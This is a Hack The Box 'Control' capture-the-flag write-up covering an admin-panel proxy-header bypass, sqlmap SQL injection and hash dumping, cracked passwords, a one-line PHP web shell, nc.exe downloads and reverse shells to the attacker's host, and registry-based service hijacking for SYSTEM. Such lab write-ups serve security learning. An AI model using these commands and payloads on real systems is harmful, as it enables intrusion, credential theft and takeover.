Control HTB

Hello fellow hackers,

This is the writeup for Control box.

As Always I did a port scan with the famous nmap and got 3 ports open.

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   Microsoft Windows RPC
3306/tcp open  mysql?
| fingerprint-strings: 
|   NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SMBProgNeg, TLSSessionReq, TerminalServerCookie, X11Probe, afp, giop: 
|_    Host '10.10.14.41' is not allowed to connect to this MariaDB server

Port 80

Homepage

I can tell from now this uses php(index.php). Inside the source code I see a comment

  <!-- To Do:
			- Import Products
			- Link to new payment system
			- Enable SSL (Certificates location \\192.168.4.28\myfiles)
<!-- Header -->

After poking the website I see that admin.php is not accessible. Because it requires us to go through a proxy.

proxy

Searching about headers I found out that header X-Forwarded-For is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy

So I open burp suite and intercept the request to 10.10.10.167/admin.php and add the IP address found in the index.php html code.

bypassproxy

Now I add into burp suite math and replace the X-Forwarded-For, so burp can add that automatically to us.

match_and_replace

Inside the admin app I can add, search, update, create products. I send each request on burp and try to find any vuln on the send parameters. I found out that search products is vulnerable to sql injection. After trying a sleep command. My request took long to respond back.

vulnpoint

I copy the request to a file and then update the parameter to be productName=* . And then give it to sqlmap to extract info for us.

First I get all the databases with sqlmap -r sqlinjection.req --dbs --batch

[*] information_schema
[*] mysql
[*] warehouse

After get all mysql tables with sqlmap -r sqlinjection -D mysql --tables --batch

Database: mysql
[31 tables]
+---------------------------+
| db                        |
| event                     |
| user                      |
| column_stats              |
| columns_priv              |
| func                      |
| general_log               |
| global_priv               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |

After get the content of user row sqlmap -r sqlinjection.req -D mysql -T user --dump

root: 0A4A5CAD344718DC418035A1F4D292BA603134D8
manager: CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
hector : 0E178792E8FC304A2E3133D535D38CAF1DA3CD9D

Add the hashes inside a file and then crack them hashcat -m 300 crackme.txt rockyou.txt

root: 0A4A5CAD344718DC418035A1F4D292BA603134D8 
manager: CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA * l3tm3!n
hector : 0E178792E8FC304A2E3133D535D38CAF1DA3CD9D l33th4x0rhector

Let’s see again if we can upload a shell to the webserver and then access the server. To do this first I check which users is managing the mysql database. sqlmap -r sqlinjection.req --current-user --batch

current user: 'manager@localhost'

And then check the privileges of that user. sqlmap -r sqlinjection.req --privileges --batch

[*] 'manager'@'localhost' [1]:
    privilege: FILE     

which means we can indeed upload a file into the webserver. I create a file and add a simple php command to execute everything I give into the fuxsocy parameter.

<?php echo system($_GET['fuxsocy']); ?>

To upload a file I use sqlmap -r sqlinjection.req --file-write=q.php --file-dest=/inetpub/wwwroot/q.php --batch

I had to guess for the destination by trying possible directories found here

Then I visit the webpage and download nc.exe from my box and execute it to get a reverse shell.

10.10.10.167/q.php?fuxsocy=curl 10.10.X.X/nc.exe > C:\Windows\Temp\nc.exe (add a webserver first with python3 -m http.server 80)
10.10.10.167/q.php?fuxsocy=C:\Windows\Temp\nc.exe 10.10.X.X 9999 -e powershell.exe 
kali@kali:~$ rlwrap nc -nvlp 9999
listening on [any] 9999 ...
connect to [10.10.14.52] from (UNKNOWN) [10.10.10.167] 50431
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot> whoami
whoami
nt authority\iusr
PS C:\inetpub\wwwroot>

Because I have the password for user hector I created a script to impersonate that user and then download the nc.exe and after get a shell back as that user.

$pass = ConvertTo-SecureString "l33th4x0rhector" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Fidelity\\hector", $pass)
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock {curl http://10.10.X.X/nc.exe -O C:\Users\hector\Desktop\nc.exe}
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock {C:\Users\hector\Desktop\nc.exe 10.10.X.X 8888 -e powershell}

hektor_user

User obtained.

The root part has to do with windows registry. To spot that we had to look into the users powershell history.

PS C:\Users\Hector\Documents> (Get-PSReadLineOption).HistorySavePath
(Get-PSReadLineOption).HistorySavePath
C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Hector\Documents> type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
PS C:\Users\Hector\Documents>

Running get-acl HKLM:\SYSTEM\CurrentControlSet\services* | format-list

Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : CREATOR OWNER Allow  FullControl
         NT AUTHORITY\Authenticated Users Allow  ReadKey
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         CONTROL\Hector Allow  FullControl <--- USER HERE HAS FULLCONTROL
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
Audit  : 
Sddl   : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KA;;;S-1-5-21-3271572904-80546332
         -2170161114-1000)(A;CI;KR;;;AC)

This means we can edit registries for a service and then execute malicious code which in our case is a reverse shell as administrator. First let’s see the services what hector has access to by issuing this command. Get-acl HKLM:\System\CurrentControlSet\Services\* | Format-List * | findstr /i "Hector Users Path" This gives us a big list with the proccess name. We would choose wuauserv.

PS C:\Users\Hector\Documents> Get-Item -path HKLM:\SYSTEM\CurrentControlSet\Services\wuauserv
Get-Item -path HKLM:\SYSTEM\CurrentControlSet\Services\wuauserv


    Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services


Name                           Property                                                                                
----                           --------                                                                                
wuauserv                       DependOnService     : {rpcss}                                                           
                               Description         : @%systemroot%\system32\wuaueng.dll,-106                           
                               DisplayName         : @%systemroot%\system32\wuaueng.dll,-105                           
                               ErrorControl        : 1                                                                 
                               FailureActions      : {128, 81, 1, 0...}                                                
                               ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p                     
                               ObjectName          : LocalSystem                                                       
                               RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege,                       
                               SeCreatePageFilePrivilege, SeTcbPrivilege...}                                           
                               ServiceSidType      : 1                                                                 
                               Start               : 3                                                                 
                               SvcMemHardLimitInMB : 246                                                               
                               SvcMemMidLimitInMB  : 167                                                               
                               SvcMemSoftLimitInMB : 88                                                                
                               Type                : 32                                                                


PS C:\Users\Hector\Documents> 

I am using the wuauserv service as this service is the service windows use to check if an update is available and then stops so this should have a good chance to be inactive.

Let’s edit the ImagePath

Addreg

setup listener and download nc then start the service.

end

The quieter you become, the more you are able to hear.
DHT4tMDxN34WgmtcX9em8AGMeqMpSechq4